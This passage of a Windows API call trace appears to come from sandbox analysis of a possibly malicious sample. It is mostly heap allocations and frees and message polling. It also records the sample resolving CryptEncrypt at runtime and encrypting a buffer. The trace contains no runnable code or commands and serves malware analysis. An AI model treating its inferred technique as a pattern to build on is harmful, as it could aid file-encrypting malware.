(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0206.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0206.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.503] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.503] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.503] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.504] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.505] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.505] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24bf868 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0206.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0206.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0206.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aaec0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0206.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.510] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0206.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0206.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.511] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x7e14, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x7e18) returned 1 [0206.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a9e68 [0206.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0206.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.514] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.514] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.515] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.515] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0206.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.516] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.516] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.516] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 